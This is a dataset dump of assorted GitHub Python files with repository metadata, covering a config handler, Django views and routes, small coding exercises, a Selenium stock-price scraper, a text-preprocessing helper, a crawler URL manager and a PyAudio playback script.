blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
510dd57a125e1dab59c4eb0b49f8871bd744a6a2 | f8e1329747ca908ff8c13245fb6be44a0a4577a3 | /DataCollector/configHandler.py | a337a608cb3a8b716459f89cbf4b6f11e40d5dbc | [] | no_license | FlucTuAteDev/EuProNet-Database | 058ba7a19e7cca487e826787ca4241c9b262bed7 | ba72421dbd8832f7c20761ff74cf240f49b350a4 | refs/heads/master | 2021-02-07T00:12:28.653012 | 2020-10-15T16:09:17 | 2020-10-15T16:09:17 | 243,960,243 | 1 | 1 | null | 2020-10-15T16:09:18 | 2020-02-29T11:56:27 | Python | UTF-8 | Python | false | false | 3,236 | py | # region - Imports
import re
from collections import namedtuple
# endregion
# region - Classes
class configHandler:
    """Load, validate, and persist simple key/value configuration files.

    Each setting is declared as ``name: (regex, requestMessage)``: *regex*
    validates a candidate value, *requestMessage* is the prompt used to ask
    the user for a value that is missing or invalid.
    """
    # region - Dunder methods
    def __init__(self, configSettings: dict, filepath: str = "config.cfg", keyValueSeparator: str = "="):
        """
        configSettings: dict(configName : (regex, requestMessage))
        filepath: the path of the configuration file
        keyValueSeparator: string separating keys from values in the file
        """
        configSet = namedtuple("configSet", "regex requestMessage")
        self.filepath = filepath
        self.keyValueSeparator = keyValueSeparator
        # Convert the tuples to namedtuples for easy and readable access.
        try:
            self.configSettings = {key: configSet(*value)
                                   for key, value in configSettings.items()}
        except (TypeError, ValueError) as exc:
            # Narrowed from a bare except; a wrong-shaped tuple raises TypeError.
            raise Exception("Invalid configuration settings given") from exc
        self.cfg = {}

    # Parked dunder implementations kept for reference (currently disabled).
    """
    def __iter__(self):
        return iter(self.cfg)

    def __next__(self):
        return next(self.cfg)

    def items(self):
        return self.cfg.items()

    def get(self, key: str, default = None):
        return self.cfg.get(key, default)
    """
    # endregion

    # region - Methods
    # Requests the user to set all the configuration values properly if not given
    def setUserConfigs(self):
        """Fill ``self.cfg`` from the config file, prompt for anything missing
        or invalid, rewrite the file, and expose each value as an attribute
        (converted to float where possible)."""
        # Set all the config values to None.
        # If cfg[key] remains None then request that value from the user.
        for key in self.configSettings.keys():
            self.cfg[key] = None
        # Read correct data into the cfg storage.
        try:
            with open(self.filepath, "r") as f:
                # [[key, value], [key, value], ...]
                configs = [line.split(self.keyValueSeparator, 1) for line in f.readlines()]
                # Check the key and the value against configuration requirements.
                for config in configs:
                    try:
                        key, value = (x.strip() for x in config)
                        if re.match(self.configSettings[key].regex, value):
                            self.cfg[key] = value
                    except (ValueError, KeyError, re.error):
                        # Malformed line or unknown key: leave the config value None.
                        pass
        except OSError:
            # If the file open fails then every config value should remain None.
            pass
        for key, value in self.cfg.items():
            # If the value is not set, get it from the user.
            if value is None:
                while not re.match(self.configSettings[key].regex, "" if value is None else value):
                    value = input(self.configSettings[key].requestMessage)
                self.cfg[key] = value
        # Rewrite the config file with the validated values.
        with open(self.filepath, "w") as f:
            for key, value in self.cfg.items():
                f.write(f"{key}{self.keyValueSeparator}{value}\n")
        # Set attributes for easy access (like cfg.monitoredFolder).
        for key, value in self.cfg.items():
            try:
                setattr(self, key, float(value))
            except (TypeError, ValueError):
                setattr(self, key, value)
    # endregion
# endregion
# endregion
| [
"gucziadamlaszlo@gmail.com"
] | gucziadamlaszlo@gmail.com |
eb599ad48afd47de67a5a38758872173421836a2 | f2a0c0cad8ccc82ac00c7fa9dbf06c5fec96089c | /Student_Management/main/urls.py | b6fe5fc9e31bae12859e560cff9d8544ad9433a3 | [] | no_license | tushargoyal22/Django-Learning | 49bb0c97f6e344dae053a3c913a74c765a9a021b | eb87ac56220d7f0e1e4741cda754547180835713 | refs/heads/master | 2020-12-26T18:12:07.305533 | 2020-04-20T06:22:14 | 2020-04-20T06:22:14 | 237,585,513 | 0 | 0 | null | 2020-06-06T09:08:09 | 2020-02-01T08:31:48 | CSS | UTF-8 | Python | false | false | 497 | py | from django.urls import path
from main import views
# URL routing table for the `main` app: maps request paths to class-based views.
urlpatterns = [
    path('', views.Index.as_view()),
    # Detail page for a single college, addressed by primary key.
    path('college/<int:pk>' , views.CollegeDetail.as_view(), name='college'),
    path('colleges/', views.CollegeList.as_view()),
    path('create_college/' , views.CollegeCreate.as_view()),
    path('update_college/<int:pk>' , views.CollegeUpdate.as_view()),
    path('create_student/' , views.StudentCreate.as_view()),
    path('delete_student/<int:pk>' , views.StudentDelete.as_view())
]
| [
"tushar22.tg.tg@gmail.com"
] | tushar22.tg.tg@gmail.com |
e32885af94380c637c2e329002e6eddadc8fcf74 | fb391ea6a3f72f3007b2dc10ed7cd746b2d59642 | /lesson7/exp2.py | a1062041858fa117dbee3789381380959fd5fd6b | [] | no_license | KremenenkoAlex/Python | 6946cec411b6a0c114a17cd1061168f992cde7b2 | f7b4d7f6283b5ff524068cddac3c2872359a17ab | refs/heads/main | 2023-03-02T12:07:11.589231 | 2021-01-30T14:08:48 | 2021-01-30T14:08:48 | 322,815,827 | 0 | 0 | null | 2020-12-26T10:12:02 | 2020-12-19T09:56:38 | null | UTF-8 | Python | false | false | 843 | py | from abc import ABC, abstractmethod
class Clothes(ABC):
    """Abstract base for garments; `param` is the size input used by the
    `necessary` fabric-consumption calculation."""
    def __init__(self, param):
        self.param = param

    @abstractmethod
    def necessary(self):
        """Return a human-readable fabric-consumption message."""
        pass
class Coat(Clothes):
    """Coat: fabric needed is param / 6.5 + 0.5."""
    def necessary(self):
        consumed = self.param / 6.5 + 0.5
        return "Сумма затраченной ткани на пальто равна: {:.2f}".format(consumed)
class Suit(Clothes):
    """Suit: fabric needed is 2 * param + 0.3."""
    def necessary(self):
        consumed = 2 * self.param + 0.3
        return "Сумма затраченной ткани на костюм равна: {:.2f}".format(consumed)
class Full(Clothes):
    """Combined total for a coat plus a suit; exposed as a property, so it
    is read without call parentheses."""
    @property
    def necessary(self):
        total = self.param / 6.5 + 0.5 + 2 * self.param + 0.3
        return "Сумма затраченной ткани равна: {:.2f}".format(total)
# Demo: fabric consumption for each garment with the same parameter.
coat = Coat(100)
suit = Suit(100)
full = Full(100)
print(coat.necessary())
print(suit.necessary())
# Full.necessary is a property, hence no call parentheses here.
print(full.necessary)
"kremenenko2008@mail.ru"
] | kremenenko2008@mail.ru |
941112e2fd1cd212d7d406d0bbaa7e2bae415bc3 | 217a6c88943e75c79929b69657179f59cd6969c4 | /Auth/serializers/user_my_languages.py | ff166117be4a8a0ccb4a6175ad4c35cd0841fe6c | [] | no_license | manish86510/testapi | 15109428ffb91f434368cb810dfeb790aa45d1d6 | e2cc0f5cb2369e7ad5392773942d642a01bb9f80 | refs/heads/master | 2022-12-11T03:03:57.132046 | 2020-02-25T16:55:23 | 2020-02-25T16:55:23 | 243,049,848 | 0 | 0 | null | 2022-12-08T07:12:56 | 2020-02-25T16:51:39 | Python | UTF-8 | Python | false | false | 466 | py | from rest_framework import serializers
from Auth.models import MyLanguage
class MyLanguageSerializer(serializers.ModelSerializer):
    """Read serializer for MyLanguage records; includes the owning `user`."""
    class Meta:
        model = MyLanguage
        fields = ["id", "name", "read", "write", "speak", 'user']
        # fields = "__all__"
class MyLanguageCreateSerializer(serializers.ModelSerializer):
    """Create serializer for MyLanguage; `user` is omitted — presumably it
    is set from the request in the view (TODO confirm)."""
    class Meta:
        model = MyLanguage
        fields = ["id", "name", "read", "write", "speak"]
        # fields = "__all__"
| [
"ishu.k@skysoft.net.in"
] | ishu.k@skysoft.net.in |
0c537ff811c0d6ba4bad2d771c8537a196c9043a | db9e654cba94034797a49897bc8185168ed13838 | /Week4/7-Count-of-All-Pairs-With-Zero-Sum/pairs.py | 04bb43e586bbcf29548121c513f32da0dcc0752e | [] | no_license | smonov/HomeWork | f0a65f3edcd436b25103a14bcd9b8a291cdc1f58 | 53053ba11fa2cdad2c27d167847f688ef1fd59ba | refs/heads/master | 2021-03-12T22:08:31.464281 | 2015-09-30T16:13:57 | 2015-09-30T16:13:57 | 31,278,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | #Week4 Task7 count_of_all_pairs_wit_zer_sum
def count_zero_neighbours(numbers):
count = 0
index = 0
for number in numbers:
if index < len(numbers) - 1:
neighbour = numbers[index + 1]
if number + neighbour == 0:
count += 1
index += 1
return count
def count_zero_pairs(numbers):
count = 0
n = len(numbers)
for x_index in range(0, n):
for y_index in range(x_index, n):
x = numbers[x_index]
y = numbers[y_index]
if x + y == 0:
count += 1
return count
def is_prime(n):
start = 2
is_prime = True
while start < n:
if n % start == 0:
is_prime = False
break
start += 1
return is_prime
def prime_pair(numbers):
for x in numbers:
for y in numbers:
if is_prime(x + y):
return True
return False
| [
"smonov@abv.bg"
] | smonov@abv.bg |
e187641d7db47cec739bd694e61860ff1f2d4b26 | a48eaa4419b87c011abdee1eebfd04b469f4417b | /.history/ghostpost/views_20200211120737.py | 0c516f78e19399fa4ac83bde5fc952b2f89adef3 | [] | no_license | Imraj423/ghostpost | 6418d6c9561528ac8c31dd70d8aae7fac4c77cca | 4edc559eb1f9ef0d11aae78e2b1dbd5c4903ddb5 | refs/heads/master | 2021-01-02T13:32:58.032239 | 2020-02-11T23:21:31 | 2020-02-11T23:21:31 | 239,644,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,858 | py |
from django.shortcuts import render
from django.contrib.auth.models import User
from ghostpost.models import ghostPost
from django.shortcuts import render, reverse, HttpResponseRedirect
from ghostpost.forms import addPost
def index(request):
item = ghostPost.objects.all()
return render(request, 'index.html', {'data': item})
def detail(request):
item = ghostPost.objects.all()
return render(request, 'detail.html', {'data': item})
def post_add(request):
html = 'addpost.html'
if request.method == 'POST':
form = addPost(request.POST)
if form.is_valid():
data = form.cleaned_data
ghostPost.objects.create(
message=data['message'],
is_Boast=data['is_Boast']
)
return HttpResponseRedirect(reverse("index"))
form = addPost()
return render(request, html, {'form': form})
def like(request, id):
post = ghostPost.objects.get(id=id)
post.like += 1
post.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def dislike(request, id):
post = ghostPost.objects.get(id=id)
post.like -= 1
post.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def sorted(request):
html = "index.html"
data = ghostPost.objects.all().order_by(
"-like")
return render(request, html, {"data": data})
def sortedt(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-time")
return render(request, html, {"data": data})
def sortedb(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-is_Boast")
return render(request, html, {"data": data})
def sortedb(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-is_Boast=False")
return render(request, html, {"data": data})
| [
"dahqniss@gmail.com"
] | dahqniss@gmail.com |
7f397abd25523532057ca09c4d0096c9bb8e847f | 7e1ea98a04ac3d5c6cee48d42ca08a41b2c0f397 | /books_app.py | e7817daf580717ae38aaedcdf5c44f291564b2ce | [
"MIT"
] | permissive | mihalw28/library_books | ec15a09db036e9b1215115b618a225f635d40a28 | bdb82341e65fc8a3f91f7b111f63ab343a62427b | refs/heads/master | 2022-12-14T01:30:01.651421 | 2019-10-01T09:23:31 | 2019-10-01T09:23:31 | 186,705,758 | 1 | 0 | MIT | 2022-12-08T05:07:50 | 2019-05-14T21:51:52 | Python | UTF-8 | Python | false | false | 226 | py | from app import app as application, db
from app.models import Author, Book, Category
@application.shell_context_processor
def make_shell_context():
    """Expose the db handle and the models in the `flask shell` namespace."""
    return {"db": db, "Author": Author, "Book": Book, "Category": Category}
| [
"michal.waszak@yahoo.com"
] | michal.waszak@yahoo.com |
8de0fb64fa57bd58c266f1d3d2226bb6c203a8e1 | c0d1de2e61fc66ec51a670eaa8bd731e993292d2 | /FCST/Read_Data.py | 7743f09432162d5c3e851d53dc62e31388192408 | [
"MIT"
] | permissive | WillhelmKai/PyPortfolioOpt | 204d9e2fb176b4e8bd3947e881a6860309b0f524 | 6a040416520aaee4035528b0f2b4d6cdb3abc15f | refs/heads/master | 2021-01-07T03:42:45.077964 | 2020-04-20T02:46:26 | 2020-04-20T02:46:26 | 241,569,327 | 2 | 0 | null | 2020-02-19T08:24:54 | 2020-02-19T08:24:54 | null | UTF-8 | Python | false | false | 1,655 | py | #coding by Willhelm
import requests
import time
import pandas as pd
from sklearn import preprocessing
#sample query
#https://query1.finance.yahoo.com/v7/finance/download/0288.HK?period1=1546300800&period2=1577750400&interval=1d&events=history&crumb=UuO4UZuUbll
class market_Dataset(object):
    """Loads a Yahoo!-Finance-style CSV and slices it into fixed-length
    input/target packages for train / validation / test splits."""

    def __init__(self, path):
        '''
        Instance variables:
        Public methods:
        '''
        # path: CSV file with a "Date" index column plus price/volume columns.
        self.data_path = path

    def read(self, package_length):
        """Build sliding-window samples of `package_length` rows each.

        Returns the training samples (list of {"Input", "Target"} dicts,
        unchanged from the original interface); the validation and testing
        samples are additionally exposed as `self.validation` / `self.testing`.
        """
        df = pd.read_csv(self.data_path, parse_dates=True, index_col="Date")
        # Keep adjusted close and volume, then standardise both columns.
        df = df[['Adj Close', 'Volume']]
        scaler = preprocessing.StandardScaler().fit(df)
        mean, stdv = scaler.mean_, scaler.scale_
        df = scaler.transform(df)
        # 60 / 20 / 20 chronological split.
        length = len(df)
        df_train = df[:int(length * 0.6)]
        df_validation = df[int(length * 0.6) + 1:int(length * 0.8)]
        df_testing = df[int(length * 0.8) + 1:]

        def make_packages(rows):
            # One sample per window: `package_length` rows in, 1 row target.
            return [{"Input": rows[i:i + package_length],
                     "Target": rows[i + package_length:i + package_length + 1]}
                    for i in range(0, len(rows) - package_length - 1)]

        train = make_packages(df_train)
        # BUG FIX: validation/testing previously *reassigned* a one-element
        # list on every loop iteration, keeping only the final window.
        validation = make_packages(df_validation)
        testing = make_packages(df_testing)
        self.train = train
        self.validation = validation
        self.testing = testing
        return train
"Willhelmkai@outlook.com"
] | Willhelmkai@outlook.com |
133c3b16ba1adaf5b0f71f1cf995a1cec6f217f7 | a35632bd878ad4e7e0c1c72e0232c7d6a2866cc8 | /preprocessing.py | 1bcabea24b26f917cdc431426ca1fc45a3798033 | [] | no_license | leowe/jgwiki | bc5a000f5e8b0007b610fdb78406ffa7436823b7 | 571249021483f160b77eeb3f5473a8392fef2168 | refs/heads/master | 2021-01-19T05:01:51.725127 | 2016-08-03T17:20:22 | 2016-08-03T17:20:22 | 64,864,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | import re
from nltk.corpus import stopwords
from nltk.tokenize import wordpunct_tokenize, regexp_tokenize
from nltk.stem.snowball import SnowballStemmer
from collections import defaultdict
stop_words = set(stopwords.words('german'))
#stop_words.update(['.', ',', '"', "'", '?', '!', ':', ';', '(', ')', '[', ']', '{', '}', '=', '-', '|', ])
stop_word_pattern = re.compile(r'''([,\.\?!"'\-+\*\(\)\{\}=:;\[\]|/#]+)''')
stemmer = SnowballStemmer('german', ignore_stopwords=True)
def tokenize_stopword_removal(text, lang='english'):
    """Strip punctuation, tokenize, lowercase, and drop stopwords and
    single-character tokens.

    NOTE(review): `lang` is unused — the module-level `stop_words` are
    German regardless; confirm whether per-call languages were intended.
    """
    text = re.sub(stop_word_pattern, '', text)
    return [i.lower() for i in wordpunct_tokenize(text) if i.lower() not in stop_words if len(i) > 1]
def tokenize_stem(text):
    """Tokenize `text` (stopwords removed) and stem every resulting token."""
    return [stemmer.stem(token) for token in tokenize_stopword_removal(text)]
def count_tokens(tokens):
    """Return a mapping token -> occurrence count; unseen tokens read as 0
    (the result is a defaultdict(int))."""
    counts = defaultdict(int)
    for tok in tokens:
        counts[tok] += 1
    return counts
def max_count_token(token_counts):
    """Return the highest occurrence count in `token_counts`.

    Simplified: finding the max-count key and then looking its count up is
    just the maximum of the values. Raises ValueError on an empty mapping,
    exactly like the original.
    """
    return max(token_counts.values())
| [
"leowndt@gmail.com"
] | leowndt@gmail.com |
697e048e4350aa768d9f762d8bb329c1113d6744 | 1bebf14ef1216332863372c677ff048ab88f5006 | /problem solving/Implementation/Drawing book.py | 9ea8b066f34a39d848b102d9a1c4946df08e82fa | [] | no_license | Zahidsqldba07/hackerrank-codes-in-python | 2c179a91b5afaa63cb38e3aee21cdad67bf84773 | 7e1296d2f3d183b5a4702e83e930f05667ba5677 | refs/heads/master | 2023-03-17T23:21:44.836820 | 2020-06-26T13:00:00 | 2020-06-26T13:00:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | #!/bin/python3
import os
import sys
#
# Complete the pageCount function below.
#
def pageCount(n, p):
    """Minimum page turns to reach page `p` in an `n`-page book, starting
    from either the front cover or the back cover."""
    from_front = p // 2
    from_back = n // 2 - p // 2
    return min(from_front, from_back)
#
# Write your code here.
#
if __name__ == '__main__':
    # HackerRank harness: read n (pages) and p (target page) from stdin and
    # write the answer to the path given in OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    n = int(input())
    p = int(input())

    result = pageCount(n, p)

    fptr.write(str(result) + '\n')

    fptr.close()
| [
"50777789+sajal1302@users.noreply.github.com"
] | 50777789+sajal1302@users.noreply.github.com |
652e8748f26f358862132b7fc9300aa65f1f05ec | 3ff9821b1984417a83a75c7d186da9228e13ead9 | /No_0530_Minimum Absolute Difference in BST/minimum_absolute)difference_in_BST_by_inorder_iteration.py | a7418dd3d34f9db81a543e4abdb35916f72c1593 | [
"MIT"
] | permissive | brianchiang-tw/leetcode | fd4df1917daef403c48cb5a3f5834579526ad0c2 | 6978acfb8cb767002cb953d02be68999845425f3 | refs/heads/master | 2023-06-11T00:44:01.423772 | 2023-06-01T03:52:00 | 2023-06-01T03:52:00 | 222,939,709 | 41 | 12 | null | null | null | null | UTF-8 | Python | false | false | 2,094 | py | '''
Description:
Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
Example:
Input:
1
\
3
/
2
Output:
1
Explanation:
The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
Note: There are at least two nodes in this BST.
'''
class TreeNode:
    """Plain binary-tree node: a value plus left/right child links."""
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution:
    def getMinimumDifference(self, root: "TreeNode") -> int:
        """Minimum absolute difference between values of any two nodes in a
        BST with non-negative values (at least two nodes).

        Iterative in-order traversal: in a BST the in-order sequence is
        sorted, so the answer is the smallest gap between consecutive
        visited values.
        """
        # Stack entries are (node, label); label 'c' marks a node whose left
        # subtree has already been scheduled and which is ready to visit.
        traversal_stack = [(root, 'init')]
        min_diff, prev_value = float('inf'), -2 ** 31

        while traversal_stack:
            node, label = traversal_stack.pop()

            # BUG FIX: was `label is not 'c'` — identity comparison against a
            # string literal (SyntaxWarning on modern CPython); use `!=`.
            if label != 'c':
                if node.right:
                    traversal_stack.append((node.right, 'r'))
                traversal_stack.append((node, 'c'))
                if node.left:
                    traversal_stack.append((node.left, 'l'))
            else:
                # In-order visit: compare against the previous in-order value.
                min_diff = min(min_diff, node.val - prev_value)
                prev_value = node.val

        return min_diff
# n : the number of nodes in binary search tree
## Time Complexity: O( n )
#
# The overhead in time is the cost of in-order traversal, which is of O( n )
## Space Complexity: O( n )
#
# THe overhead in space is the storage for traversal_queue, which is of O( n )
def test_bench():
    """Ad-hoc smoke tests: builds the two example BSTs from the problem
    statement and prints the minimum absolute difference for each."""
    ## Test case_#1
    root_1 = TreeNode(1)
    root_1.right = TreeNode(3)
    root_1.right.left = TreeNode(2)
    # expected output:
    '''
    1
    '''
    print(Solution().getMinimumDifference(root_1))

    ## Test case_#2
    root_2 = TreeNode(5)
    root_2.left = TreeNode(1)
    root_2.right = TreeNode(10)
    root_2.right.left = TreeNode(8)
    root_2.right.right = TreeNode(13)
    # expected output:
    '''
    2
    '''
    print(Solution().getMinimumDifference(root_2))


if __name__ == '__main__':
    test_bench()
"brianchiang1988@icloud.com"
] | brianchiang1988@icloud.com |
0efc2c824d85ee64bdfdb49c3b5efa82afeaff0b | b4ac05882e479636e19e2759a6e3d7fef1716e99 | /Stocks.py | b5cc476c3161be6d99bcbaa93ff5cbd9cb0b7c81 | [] | no_license | ganesh-8/Stocks_Software | 84e88d6d337499ce31f4ba05097acaabe5930d6f | 1ef9e653ef7cf4371a7fc66784efaf26fe72147f | refs/heads/main | 2023-08-01T23:59:07.363688 | 2021-10-10T11:37:58 | 2021-10-10T11:37:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,617 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import os
import glob
import pandas as pd
import time
import numpy as np
import xlsxwriter
# Scrapes historical share prices from bseindia.com with Selenium, computes
# yearly average close prices (FY 2011-12 .. FY 2020-21) per company, and
# writes them to an Excel workbook.
# NOTE(review): indentation was reconstructed from a flattened dump — verify
# loop nesting against the original file.
companyList = ["ABB", "Reliance Industries"]
browser = webdriver.Chrome(r'C:\\Users\\smart\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe')
book = xlsxwriter.Workbook("C:/Users/smart/Desktop/AllStocksList.xlsx")
sheet = book.add_worksheet()
sheet.write(0, 0, "CompanyName")
startYear = ['2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020']
endYear = ['2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']
# Header row: one column per fiscal year.
for i in range(10):
    sheet.write(0, i + 1, "FY" + startYear[i] + "-" + endYear[i])
const_var = 1
for companyName in companyList:
    # Search the company on BSE and open its quote page.
    browser.get("https://www.bseindia.com/")
    searchBar = browser.find_element_by_id("getquotesearch")
    searchBar.send_keys(companyName)
    browser.implicitly_wait(10)
    searchBar.send_keys(Keys.ENTER)
    browser.implicitly_wait(50)
    # Navigate to the historical data ("archives") section.
    archives = browser.find_element_by_xpath('//*[@id="getquoteheader"]/div[6]/div/div[3]/div/div[3]/div[2]/a/input')
    archives.send_keys(Keys.ENTER)
    # From-date: 1 April 2011.
    browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_txtFromDate"]').click()
    browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/div/div/select[1]').send_keys("APR")
    browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/div/div/select[2]').send_keys("2011")
    browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/table/tbody/tr[1]/td[6]/a').send_keys("1")
    browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/table/tbody/tr[1]/td[6]/a').click()
    browser.implicitly_wait(50)
    # To-date: 31 March (current calendar shown).
    browser.find_element_by_xpath(
        '/html/body/form/div[4]/div/div/div[1]/div/div[3]/div/div/table/tbody/tr[4]/td/table/tbody/tr/td/div/table/tbody/tr[1]/td[3]/input').click()
    browser.find_element_by_xpath('/html/body/div/div/div/select[1]').send_keys("MAR")
    browser.find_element_by_xpath('/html/body/div/div/div/select[1]').click()
    browser.implicitly_wait(10)
    browser.find_element_by_xpath('/html/body/div/table/tbody/tr[5]/td[4]/a').send_keys("31")
    browser.find_element_by_xpath('/html/body/div/table/tbody/tr[5]/td[4]/a').click()
    browser.implicitly_wait(10)
    # Submit the form and download the CSV of historical prices.
    browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_btnSubmit"]').click()
    browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_btnDownload1"]/i').click()
    # Crude wait for the download to finish, then pick the newest CSV.
    time.sleep(10)
    list_of_files = glob.glob('C:/Users/smart/Downloads/*.csv')  # * means all if need specific format then *.csv
    latest_file = max(list_of_files, key=os.path.getctime)
    print(latest_file)
    data = pd.read_csv(latest_file)
    avgList = []
    df = pd.DataFrame(data, columns=["Date", "Close Price"])
    dates = data.loc[:, "Date"]
    df['Date'] = pd.to_datetime(df['Date'])
    startYear = ['2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020']
    endYear = ['2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']
    closePriceAvgList = []
    i = 0
    # Average close price per fiscal year (1 Apr .. 31 Mar).
    while i < len(startYear):
        mask = ((df['Date'] >= startYear[i] + "-04-01") & (df['Date'] <= endYear[i] + "-03-31"))
        df1 = df.loc[mask]
        closePriceAvg = df1['Close Price'].mean()
        closePriceAvgList.append(closePriceAvg)
        i += 1
    # Write one row per company; the name cell is rewritten every column.
    i = 1
    for stock in closePriceAvgList:
        sheet.write(const_var, 0, companyName)
        sheet.write(const_var, i, stock)
        i += 1
        print(stock)
    const_var += 1
    # Debug output for the *last* fiscal-year slice only.
    print(df.loc[mask])
    print(closePriceAvg)
book.close()
"ganesh.sv@surya-soft.com"
] | ganesh.sv@surya-soft.com |
4a7fa456d169a00bddd9c0491088b97441603746 | 4cf94ee34584c3a040f6668167535e5c614b8416 | /url_manager.py | 3a577eb555aaaf181179def5556a248ed21dae00 | [] | no_license | daozl/spider | 44cc1de635cb5646f941dd71e4e0692b7985f191 | a456de9566167d157633ce3d5e01b9625658a41f | refs/heads/master | 2021-04-30T07:45:39.224332 | 2018-02-13T08:19:02 | 2018-02-13T08:19:02 | 121,355,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 09 16:41:19 2018
@author: daozl1
"""
class UrlManager(object):
    """Tracks a crawl frontier: `new_urls` awaiting a visit and `old_urls`
    already handed out to the crawler."""

    def __init__(self):
        self.new_urls = set()
        self.old_urls = set()

    def add_new_url(self, url):
        """Queue one URL unless it is None or already known (new or old)."""
        if url is None:
            return
        already_known = url in self.new_urls or url in self.old_urls
        if not already_known:
            self.new_urls.add(url)

    def add_new_urls(self, urls):
        """Queue a batch of URLs; None or an empty batch is silently ignored."""
        if urls is None or len(urls) == 0:
            return
        for candidate in urls:
            self.add_new_url(candidate)

    def has_new_url(self):
        """True while at least one URL is still waiting to be crawled."""
        return len(self.new_urls) != 0

    def get_new_url(self):
        """Pop an arbitrary pending URL and mark it as visited."""
        url = self.new_urls.pop()
        self.old_urls.add(url)
        return url
"daozl1@lenovo.com"
] | daozl1@lenovo.com |
0aba029a55aec6ad1428eab510053224643a4fb5 | aaa13a9db81f478a1890efc23fe0c03f3736d1a6 | /package_functions/module_audiofunctions.py | 9e5164b83124632233680279a5d684151703f5c6 | [] | no_license | Seleukos/AudioTestCreator | ca295eb02ab4b7b44ae8b855dc09e76767fd4bd0 | cc75c647d0009bfb86d59f649ccf4de9726ddd47 | refs/heads/master | 2020-07-24T22:06:50.821807 | 2019-09-12T13:57:09 | 2019-09-12T13:57:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py |
import pyaudio
import wave
import sys
def playback_audiofile(filepath):
    """Play a WAV file through the default PyAudio output device, streaming
    it in CHUNK-sized frames."""
    CHUNK = 1024
    # filepath = 'C:\\Users\\Tobi_SurfacePro\\PycharmProjects\\Test_PyAudio\\Jungle Windows Start.wav'
    # Guard against an obviously-invalid (too short) path argument.
    if len(filepath) < 2:
        print("Plays a wave file.\n\nUsage: %s filename.wav" % filepath)
        sys.exit(-1)
    wf = wave.open(filepath, 'rb')
    print(wf.getnchannels())
    # NOTE(review): this monkey-patches a module-level constant on pyaudio —
    # confirm this is intentional (presumably to select the ASIO host API).
    pyaudio.paASIO = 3
    # instantiate PyAudio (1)
    p = pyaudio.PyAudio()
    print(p.get_host_api_info_by_index(0))
    print(p.get_default_host_api_info())
    # open stream (2) using the WAV file's own sample width/channels/rate
    stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
                    channels=wf.getnchannels(),
                    rate=wf.getframerate(),
                    output=True)
    # read data
    data = wf.readframes(CHUNK)
    # play stream (3): keep writing frames until the file is exhausted
    while len(data) > 0:
        stream.write(data)
        data = wf.readframes(CHUNK)
    # stop stream (4)
    stream.stop_stream()
    stream.close()
    # close PyAudio (5)
    p.terminate()
# NOTE(review): this runs at import time *before* get_soundcard_dev_info is
# defined below, so it raises NameError; move it after the def (or behind an
# `if __name__ == "__main__":` guard placed after the definition).
for x in range(100):
    get_soundcard_dev_info()
def get_soundcard_dev_info():
    """Print the PyAudio device indices whose name contains
    "TUSBAudio ASIO Driver"; prints "NONE" when no such device exists."""
    import pyaudio
    pad_sc = pyaudio.PyAudio()
    max_devs = pad_sc.get_device_count()
    input_devices_index = []
    output_devices_index = []
    for i in range(max_devs):
        devinfo = pad_sc.get_device_info_by_index(i)
        # Same index is recorded for both lists; no input/output distinction
        # is actually made here.
        if "TUSBAudio ASIO Driver" in devinfo['name']:
            input_devices_index.append(int(devinfo['index']))
            output_devices_index.append(int(devinfo['index']))
    if not input_devices_index:
        print("NONE")
    print(input_devices_index)
"meyer.tobias92_ing@gmx.de"
] | meyer.tobias92_ing@gmx.de |
